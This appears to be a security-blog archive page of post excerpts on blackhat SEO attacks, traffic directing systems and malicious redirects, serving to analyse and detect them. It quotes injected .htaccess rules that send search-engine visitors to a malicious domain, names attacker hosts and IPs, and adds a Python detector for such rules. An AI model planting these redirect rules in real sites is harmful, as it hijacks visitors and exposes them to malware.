Cloned Websites Stealing Google Rankings

We often speak of black hat SEO tactics and content scraping sites are just one example of such tactics. Scraping is the act of copying all content from a website using automated scripts, usually with the intention of stealing content or completely cloning the victim’s site. Lately we have been seeing quite a high number of clients affected by these so-called scraper sites. We’ll take a look at this kind of attack in an advanced form that results in the cloned site showing up in search results in place of the original site. These plagiarized sites abuse the way Google ranks content by sending fake organic traffic and by modifying internal backlinks on the cloned website so they no longer point to the victim’s website.

How Search Results Rank Website Content

Search engines want to return the best and most relevant pages in their search results to ensure that users have the best experience and find what they are looking for. As such, the same or similar content appearing on more than one page, or on more than one site, is not likely to rank high in the search results. One of the factors they take into consideration is the site's organic traffic performance, which helps determine where that site should be ranked. In addition to many other factors, Google uses redirects to track which results the searcher clicks on within the search engine results page (SERP), and whether the searcher returns to click other results because they did not find what they were looking for.

According to a 2013 study by Chitika:

Sites listed on the first Google search results page generate 92% of all traffic from an average search.

It makes sense, then, that any SEO-targeting attack aims to get the best possible position within Google search results, so that the activity succeeds and generates as much revenue as possible, or simply damages the SEO of the targeted website.


Hacked Websites Redirect to Porn from PDF / DOC Links

We write a lot about various blackhat SEO hacks on this blog and most of you are already familiar with such things as doorways, cloaking and SEO poisoning. This time we’ll tell you about yet another interesting blackhat SEO attack that we’ve been watching for the last year.

Let’s begin with symptoms:

.htaccess Tricks in Global.asa Files

As you might know, a lot of hacks use Apache configuration .htaccess files to override default website behavior: add conditional redirects, create virtual paths (e.g. with mod_rewrite), auto-append code to PHP scripts, etc.

In the world of IIS/ASP there is also an equivalent — Global.asa files. This file contains common declarations for all ASP scripts and should be placed in an ASP application root directory. If this file exists, ASP sessions include this file automatically.

Hacked Websites Redirect to Bitcoin

Recently, we began to notice that some hacked websites were redirecting traffic from certain browsers to the Bitcoin site, bitcoin.org. What's going on? Is Bitcoin using black hat SEO? Is their site malicious?

[Image: redirect chain to bitcoin.org in Unmask Parasites results]

As you can see, the hacked website doesn't redirect to bitcoin.org directly. It first redirects to 194 .6 .233 .7/mxjbb . cgi?default, which acts as a traffic directing system (TDS). This piece analyzes request parameters specific to the visitor (IP, browser, referrer, etc.) and decides what to do with that particular request. The TDS may have different routes for users from different countries or users with different browsers. Furthermore, the TDS may be completely uninterested in certain requests (e.g. requests from search engine and security bots, or requests from browsers that are very hard to exploit). A typical TDS would either return some HTTP error (e.g. 404 Page Not Found) or redirect unwanted traffic to some neutral third-party site. Most TDSes are configured to dump unwanted traffic to google.com.

Website Malware – Curious .htaccess Conditional Redirect Case

I really enjoy when I see different types of conditional redirects on compromised sites. They are really hard to detect and always lead to interesting investigations. Take a look at this last one we identified:

[Image: the curious .htaccess payload]

The curious aspect about it is the use of a not-so-common .htaccess feature: variables. Most conditional injections rely only on the user agent (browser) or referrer of the visitor, but this one also leveraged the TIME_SEC and VWM variables:

# Store the current second of the server clock in the environment variable cNL
RewriteRule .* - [E=cNL:%{TIME_SEC}]
# Store the attacker's hostname in the environment variable VWM for later rules to reference
RewriteRule .* - [E=VWM:oktovia.jonesatlarge.com]


From a Site Compromise to Full Root Access – Symlinks to Root – Part I

When an attacker manages to compromise and get access to a website, they are unlikely to stop there; they will aim to gain full root (admin) access to the entire server. If more websites are hosted on the server being attacked, it is likely they will attempt to compromise every single one of them.

How can an attacker escalate their privileges? How can they go from FTP-only access to getting root on the server? In this series of articles we will show some techniques that attackers are using to go from confined FTP/web access to full root-level access on a server.

SiteCheck – Got Blackhat SEO Spam Warning?

As of late it seems like we're talking about a lot of spam-related cases, and this post will be no different.

Blackhat SEO

Before you start, let me preface this by saying that clearing a Blackhat SEO Spam injection is probably the biggest PITA (Google It) infection there is. They constantly evolve, which makes them difficult to detect, and they employ both new and old techniques that, even after years, still prove to be annoying. This post will demonstrate one such case.

Redirection Malware Very Good Leads to Fake AV

If you look at our Labs malware dump for the last few days, you will find something odd in the name of the top domains distributing malware:

712 redirections http://moi-verygoods.ru/simmetry?6
154 redirections http://moiverygoods.ru/simmetry?6
135 redirections http://webverygoods.ru/simmetry?6
131 redirections http://moiverygoods.ru/simmetry?6
88 redirections http://24-verygoods.ru/in.cgi?9


Sucuri SiteCheck – Web Malware Distribution – May 2012

Last month (May 2012), we were able to identify 94,866 compromised (hacked) websites using our free SiteCheck scanner.

These were the top infections per distribution type (iframes and conditional redirections). A comparison to April can be seen in Sucuri SiteCheck – Web Malware Distribution – April 2012:

You can follow the daily activity in our labs more closely on the Sucuri Labs page.

Conditional (often htaccess) redirections:

Malware Redirecting To Enormousw1illa.com

We are seeing a large number of sites compromised with a conditional redirection to the domain http://enormousw1illa.com/ (194.28.114.102).

On all the sites we analyzed, the .htaccess file was modified so that if anyone visited the site from Google, Bing, Yahoo, or any major search engine (by checking the referer), it would get redirected to that malicious domain (http://enormousw1illa.com/nl-in.php?nnn=556).

This is what gets added to the .htaccess file of the hacked sites:

RewriteEngine On
# Inherit rewrite rules from the parent directory so the redirect applies site-wide
RewriteOptions inherit
# Match only visitors arriving from a search engine (case-insensitive referer check)
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
# Send every request from such a visitor to the malicious domain
RewriteRule .* http://enormousw1illa.com/nl-in.php?nnn=556 [R,L]
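The rule above has a recognizable shape: a RewriteCond on HTTP_REFERER naming search engines, followed by a RewriteRule whose target is an absolute URL on a host the site does not own. The following script, an added example rather than code from this post, pairs RewriteCond lines with the RewriteRule they guard and flags that pattern; the .htaccess text and the list of "own" hosts (www.example.com) are constructed for the demonstration.

```python
from urllib.parse import urlparse

# Constructed sample: the rule block from this post, plus a benign HTTPS redirect for contrast.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://enormousw1illa.com/nl-in.php?nnn=556 [R,L]
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://www.example.com/$1 [R=301,L]
"""

# Search-engine names commonly seen in referer-based conditional redirects.
SEARCH_ENGINES = ("google", "bing", "yahoo", "msn", "aol", "ask", "altavista", "excite", "live")


def find_referrer_redirects(htaccess_text, own_hosts):
    """Return (rule_line, target_host) for each RewriteRule that redirects off-site
    and is guarded by a RewriteCond on HTTP_REFERER mentioning a search engine."""
    findings = []
    pending_conds = []  # RewriteCond lines accumulate until the next RewriteRule consumes them
    for raw in htaccess_text.splitlines():
        line = raw.strip()
        if line.startswith("RewriteCond"):
            pending_conds.append(line)
            continue
        if not line.startswith("RewriteRule"):
            continue
        parts = line.split()
        target = parts[2] if len(parts) > 2 else ""
        host = urlparse(target).netloc.lower()  # empty for relative or "-" targets
        referrer_guarded = any(
            "HTTP_REFERER" in cond and any(se in cond.lower() for se in SEARCH_ENGINES)
            for cond in pending_conds
        )
        if host and host not in own_hosts and referrer_guarded:
            findings.append((line, host))
        pending_conds = []  # conditions only apply to the RewriteRule that follows them
    return findings


if __name__ == "__main__":
    for rule, host in find_referrer_redirects(SAMPLE_HTACCESS, {"www.example.com"}):
        print(f"suspicious referer-conditioned redirect to {host}: {rule}")
```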

Google is already blacklisting it and has so far found that it was used to compromise 787 domains (the real number is probably higher, since that domain only went live 3 days ago, on Jan 29):

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 787 domain(s), including mieszkanielondyn.com/, thecentsiblelife.com/, red66.com/.

What is very interesting is that this malware is hosted at the same IP address as other domains that were used in .htaccess attacks in the past, so we think it is all done by the same group:

enormousw1illa.com
infoitpoweringgathering.com
sweepstakesandcontestsdo.com
sweepstakesandcontestsnow.com
.. few more domains ..

We will be monitoring how it is growing and we will post more details soon.
If your site is compromised, check your .htaccess to see if it was modified. If you are not sure, run a scan on your site here: http://sitecheck.sucuri.net